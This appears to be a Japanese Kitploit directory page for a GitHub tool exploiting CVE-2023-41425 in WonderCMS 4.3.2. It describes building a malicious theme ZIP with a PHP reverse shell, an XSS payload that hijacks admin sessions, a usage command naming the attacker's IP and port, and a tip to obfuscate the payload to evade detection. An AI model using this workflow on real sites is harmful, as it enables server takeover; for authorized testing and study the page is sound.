Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-41425-RCE-WonderCMS-4.3.2 — WonderCMS に悪意のあるテーマモジュールをインストールするための JavaScript XSS ペイロードの作成とホスティングを自動化し、リモートコード実行を介してリバースシェルを起動します。このツールはペイロードとして PentestMonkey の PHP リバースシェルスクリプトを使用します。 | Kitploit
ツール/GitHubGitHub/tea-on/cve-2023-41425-rce-wondercms-4.3.2
フィッシングツールペイロード生成エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
tea-on/cve-2023-41425-rce-wondercms-4.3.2

CVE-2023-41425-RCE-WonderCMS-4.3.2

WonderCMS に悪意のあるテーマモジュールをインストールするための JavaScript XSS ペイロードの作成とホスティングを自動化し、リモートコード実行を介してリバースシェルを起動します。このツールはペイロードとして PentestMonkey の PHP リバースシェルスクリプトを使用します。

リポジトリを見る
81年前未レビュー

🚨 WonderCMS RCE エクスプロイトツール (CVE-2023-41425)

このPythonベースの攻撃的セキュリティツールは、WonderCMS 4.3.2 の Remote Code Execution (RCE) 脆弱性(具体的には CVE-2023-41425)のエクスプロイトを自動化します。悪意のあるZIPテーマモジュールを作成し、JavaScriptベースのXSSペイロードを配信して管理者セッションを乗っ取り、PHPリバースシェルを展開するプロセスを効率化します。

⚠️ 教育目的および許可されたセキュリティテスト目的のみに使用してください。


📚 目次

  • ⚙️ 機能
  • 📥 インストールと要件
  • 🚀 使用例
  • 🧾 引数リファレンス
  • 🧠 詳細なワークフロー
  • 🔐 セキュリティに関する注意
  • 📝 ライセンスと帰属

⚙️ 機能

  • 埋め込まれたPHPリバースシェルを含む武器化されたZIPアーカイブを生成します
  • 管理者セッションを乗っ取るためのJavaScriptベースのXSSペイロードを作成します
  • CSRFトークンを抽出し、モジュールインストールプロセスを自動化します
  • エクスプロイトファイルをホストするためのローカルHTTPサーバーを起動します
  • Kali Linux、ParrotOS、Python 3.6+ と互換性があります

📥 インストールと要件

🔧 要件

  • Python 3.6+
  • LinuxおよびmacOSと互換性があります
  • Kali Linuxでテスト済み

📦 依存関係

このスクリプトはPythonの標準ライブラリのみに依存しています。外部パッケージは必要ありません。

🛠 インストール

UNIX

root@kitploit:~
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip

unzip main.zip

cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main

Windows

root@kitploit:~
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git

cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2

🚀 使用例

💻 Bash

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php

🪟 PowerShell(WSL推奨)

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php

🧾 引数リファレンス


🧠 詳細なワークフロー

以下はスクリプトが内部で行う処理の内訳です:

  1. 引数解析:

    • argparseを使用して攻撃者からの必須およびオプションの入力を収集します。
  2. リバースシェルの準備:

    • 提供されたPHPリバースシェルを読み取ります。
    • $ip と $port のプレースホルダを指定された -H と -p の値に置き換えます。
  3. 悪意のあるZIPの作成:

    • <dir_name>/<php_reverse_shell.php> のようなディレクトリ構造を作成します。
    • それを <zip_name>.zip に圧縮します。
  4. XSSペイロード(script.js)の生成:

    • DOM解析を介して対象ログインページからCSRFトークンを抽出します。
    • ホストされているZIPを使用してモジュールインストールURLを構築します。
    • 悪意のあるテーマをインストールし、リバースシェルをトリガーします。
  5. 指示とエクスプロイトのホスティング:

    • nc リスナーコマンドを出力します。
    • 完全なXSS配信URLを表示します。
    • ZIPファイルとJSファイルの両方をホストするシンプルなHTTPサーバーを起動します。

🔐 セキュリティに関する注意

  • 🧹 クリーンアップ: 使用後は常に生成されたZIP、JSペイロード、HTTPサーバーログを削除してください。
  • 👀 検出: エクスプロイトはWonderCMSによってログに記録されたり、WAFによって検出される可能性があります。
  • 🧪 責任を持ってテスト: 明示的にテストを許可されたシステムのみを対象にしてください。
  • 🔒 リバースシェルの強化: 検出を回避するためにPHPペイロードの難読化や暗号化を検討してください。

📝 ライセンスと帰属

このツールは MIT License の下で提供されています。
🔥 を使って TeaOnHack🧋 によって作られました。

  • CVEリファレンス: CVE-2023-41425
  • WonderCMS: https://www.wondercms.com/

このプロジェクトは教育目的および許可されたセキュリティ評価のみを目的としています。作者はこのツールの誤用や損害について一切の責任を負いません。

ツールをダウンロード
引数必須説明デフォルト
-u✅対象のWonderCMSログインURL(例:http://target/index.php?...)—
-H, --host✅攻撃者のIPアドレス(リバースシェル用)—
-p✅攻撃者の待受ポート—
-r, --reverse-shell✅PHPリバースシェルスクリプトへのパス—
--dir-name❌ZIPテーマアーカイブ内のディレクトリTeaOn
--http-port❌ローカルHTTPサーバーのポート3000
--zip-name❌生成されるZIPファイルの名前reverse-shell